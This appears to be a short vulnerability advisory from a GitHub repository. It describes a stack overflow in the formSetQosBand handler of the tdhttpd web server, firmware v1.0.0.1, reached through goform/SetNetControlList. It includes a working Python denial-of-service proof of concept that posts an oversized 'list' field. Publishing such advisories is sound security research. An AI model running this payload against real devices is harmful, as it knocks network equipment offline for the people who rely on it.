Skip to content

Latest commit

 

History

History

formSetQosBand

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

Overview

Affected version

v1.0.0.1

Vulnerability details

tdhttpd in directory /bin has stack overflow vulnerability. The vulnerability occurrs in the formSetQosBand function, which can be accessed via the URL goform/SetNetControlList.

image-20220526203615461

image-20220526203642063

PoC

Poc of Denial of Service(DoS)

import requests

data = {
    b"list": b'A'*0x400+b'\n'
}
res = requests.post("http://127.0.0.1/goform/SetNetControlList", data=data)
print(res.content)